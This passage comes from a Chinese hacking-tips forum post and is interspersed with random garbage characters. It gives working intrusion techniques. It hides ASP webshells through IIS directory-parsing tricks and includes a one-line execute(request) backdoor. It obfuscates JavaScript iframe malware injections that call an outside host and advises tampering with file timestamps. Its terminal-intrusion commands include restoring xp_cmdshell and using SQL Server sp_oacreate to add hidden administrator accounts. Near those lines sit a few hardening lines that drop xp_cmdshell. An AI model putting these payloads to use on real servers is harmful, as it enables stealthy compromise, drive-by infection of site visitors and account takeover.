用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
2 t' O& q) E8 [' J7 F
' d5 A, P1 h4 I% a$ G53、隐藏ASP后门的两种方法* V% b  g5 s( |7 U+ [
1、建立非标准目录:mkdir images..\2 ^& m. @/ s7 u. d9 A
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
( T& E, L6 D7 {通过web访问ASP木马:http://ip/images../news.asp?action=login; e8 F. {. I" d/ i. f
如何删除非标准目录:rmdir images..\ /s
1 e/ Q1 F. ?. X2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
4 m" {! W/ v/ P$ V5 |" K* Tmkdir programme.asp5 \1 x* s2 ^' P# C2 X5 F7 Q
新建1.txt文件内容:<!--#include file=”12.jpg”-->: H/ C% B9 Z, X- x! s4 {
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" [: W& |7 a$ D. E- p( \  l2 V
attrib +H +S programme.asp6 G. y1 @3 g  [/ {& k" @+ S
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
% [5 _/ E6 ~: A3 K& K2 a
; G+ }5 R# C. u" G% F54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。  N) v$ Z1 Q- G0 M6 T, g
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。0 K) j; l1 `- H  M! \

3 z% G) N! C9 P4 y55、JS隐蔽挂马% z. v: ?6 r5 ]1 d; ?# @; P
1.
: x7 Y! h" u3 W& B( u3 @+ M7 Bvar tr4c3="<iframe src=ht";
: K7 |9 Z3 C8 u- Ytr4c3 = tr4c3+"tp:/";
& H' W7 J. _9 s3 ktr4c3 = tr4c3+"/ww";
/ Q2 ], @, v0 \* l8 F. O# T7 vtr4c3 = tr4c3+"w.tr4";
( e+ M( X5 r$ Ztr4c3 = tr4c3+"c3.com/inc/m";( c+ t6 A( g+ d/ }2 R1 E8 ^: o
tr4c3 = tr4c3+"m.htm style="display:none"></i";5 |  i+ A0 ]1 v
tr4c3 =tr4c3+"frame>'";: m) U( R6 o+ K, I: F8 m9 Q
document.write(tr4c3);  L) [' h& X$ I! T1 H/ E
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。8 u/ O# }8 A+ @  C) H) y
' S& R( U( H! J' t: {9 N
2.
/ H) I2 g; T; r& E3 ^7 y  _转换进制,然后用EVAL执行。如4 f  O! \% a4 R! G
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");9 G& N6 x2 [. \- T: h; c2 A
不过这个有点显眼。
6 k5 F* }7 C3 y. l; P2 B3." S4 _3 l7 x' n' l
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');3 L0 @0 {9 u( G8 ~* T
最后一点,别忘了把文件的时间也修改下。4 Z4 Z& U" T7 T+ o0 Q/ L$ T8 v

: c/ P5 ^4 V. T2 ?0 Z$ o0 e( {56.3389终端入侵常用DOS命令# s" _0 @7 ?' Z5 q8 J2 }
taskkill taskkill /PID 1248 /t: m. ]9 H+ |6 n" r

; C' J: _5 ~" dtasklist 查进程- v) V' G' v4 d' I  P
  @6 O/ E: d. y# }. S
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* Q: v' f3 r) ?# P
iisreset /reboot
1 ^1 }9 |: e: I& ~' n& C# jtsshutdn /reboot /delay:1    重起服务器! N( s; e( L+ T2 u+ e+ A4 ?

( H' }2 O# q0 T& ?6 w! j" C' qlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,, |, I( e1 ^: r
  H5 R) }7 ]% ?7 x0 l
query user 查看当前终端用户在线情况
- n# ], }' k8 Q3 J9 Y8 V2 v2 Q
! @" b$ |4 |& L要显示有关所有会话使用的进程的信息,请键入:query process *7 l$ G* i- I" f3 U

* i; ~# L, e9 t要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
2 C0 @! q% S3 X$ L4 X1 N7 x( J. z9 e' b
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER24 N. k, _) A' {' q
% J7 R5 k: Q; Z* T: ]. @. v
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 _3 [( n6 U. ]% @. \& i* s: Q3 J$ y6 o
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
. ~! o* Z) W% J- a0 ^
* V, e( c# b% {0 @1 v3 a1 N命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 ~, u0 |% J5 [4 s/ E3 C

% |# a  }- O. P1 U+ ^' i+ s6 M命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 m; C# g! T* {, A1 M
2 i5 z+ }# l9 Z  k8 B; j命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机. f, I% B: a  V7 r
4 m  o) c# T3 {! G' }
56、在地址栏或按Ctrl+O,输入:
: F; y1 A5 p) m7 tjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;$ n( f. C  R4 r6 A9 h1 `
; h% b$ G* \+ D
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。( a4 x1 d6 F" h
/ a! ]7 V: ~) z) Z9 R, N, g
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ w+ h6 P0 X& i! z
用net localgroup administrators是可以看到管理组下,加了$的用户的。1 _) `1 b; M9 K& H
8 E; K! r, W) n+ \1 C
58、 sa弱口令相关命令( b& |1 [, g( k0 R) Q4 c, E2 L

; R/ H0 Q/ I3 R- l8 Z' U1 Z8 ?! s2 y一.更改sa口令方法:
! f$ m* B/ \* q* k1 {: N  h8 Y用sql综合利用工具连接后,执行命令:
* _5 _/ D3 t" z- ~exec sp_password NULL,'20001001','sa'/ F' f7 O# U8 d. Q# x$ H3 x
(提示:慎用!)/ F$ x! H1 n; x, q" ?
( v/ G! M6 @  z) }  F" d
二.简单修补sa弱口令.+ d2 f4 j. q9 L  {: B/ \
; K! E& v" q- ~- s
方法1:查询分离器连接后执行:- j% b: r/ `. z) r. }# f
if exists (select * from
; X8 W' }/ s* [7 c% tdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and5 i+ \/ b$ R7 D$ m% W( W
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)  H  F" U! [, |4 l7 m4 l

) `& U. _+ Y+ W8 q0 i/ O" Aexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'/ g+ g/ e/ Y$ U: L; ~( w
' h/ g% R% W$ z  X; L  P% u
GO
# Q# v% M& g; \* G/ F1 v1 k5 ?" Z( G6 n
然后按F5键命令执行完毕: s; r% q  j: X
! k( C% m5 Y- ?' {7 D# B7 M
方法2:查询分离器连接后
, a, e* [; i, [5 B* t* @第一步执行:use master$ z0 @% L3 X' y' Z
第二步执行:sp_dropextendedproc 'xp_cmdshell'# ~- M' y% `2 q+ D/ Z8 d* N+ y* g9 m# J
然后按F5键命令执行完毕
0 W. s  L; C& c9 q3 X6 G/ S4 ?! O: Z* Q" T  t
, N" v" P5 Z. k; k9 I; |5 j" x( ?
三.常见情况恢复执行xp_cmdshell.) z# W1 Q9 G; g% U2 P
: ?/ J  B: x' [

" f3 K7 M7 G7 {: q0 y- Y0 L1 未能找到存储过程'master..xpcmdshell'.) B- @. f  r2 \" }3 `' o% K
   恢复方法:查询分离器连接后,
1 L  H* [: ^. S/ Z! h# D第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int8 G6 a  {* F$ Z; G7 p
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! k' N$ g: W$ m9 w$ h5 E+ J; h
然后按F5键命令执行完毕7 i9 L( j1 ?- h8 B0 g

/ X' E$ y; m) z; H8 a. z2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)2 l% [; F, ]" R, t/ j
恢复方法:查询分离器连接后,5 Z7 f6 P2 v7 m/ N
第一步执行:sp_dropextendedproc "xp_cmdshell"
3 a1 n$ o& {" {9 i9 ]% t- h第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( ^7 q7 H- u8 N$ U# i# d然后按F5键命令执行完毕
& L! n4 E: o3 j* ?& g% z9 q; x* q' q9 O
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). R' E, ?4 @6 _' x1 a* e8 F4 g4 w$ G) ]
恢复方法:查询分离器连接后,' c- J, c6 A  u
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
6 M6 }4 y& Q( b$ F第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
& v7 I( J3 R1 T' ^+ v% m1 P! |然后按F5键命令执行完毕' r* |& [! Z$ [: m; P1 X) Z

0 N! a. m3 |: B6 E4 s9 H四.终极方法.
+ R/ a- b+ K1 Q如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 t- M5 Q/ P/ q- j8 f3 X" b1 p3 Q
查询分离器连接后,
. ?# O+ w$ Q1 r2 R( k6 Y8 @6 S2000servser系统:
$ k0 F+ L- g3 y3 `& tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 D; m! X9 M1 `0 V! {% ~: _: N- z  @

4 r4 O6 |* C: C6 |# T4 T# hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
0 i/ e1 L( J3 u5 S$ |7 N$ P* n% D' }$ x% D
xp或2003server系统:2 H  I( l0 v& G4 Q) K1 y
7 a' z+ u" M/ V  v  c0 K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'8 D9 c) ?$ \+ h, A

, j5 K; a# }5 B. M' J" F4 D6 |" V4 Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. ], d9 M5 Y$ X1 h0 ^2 q5 m' Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2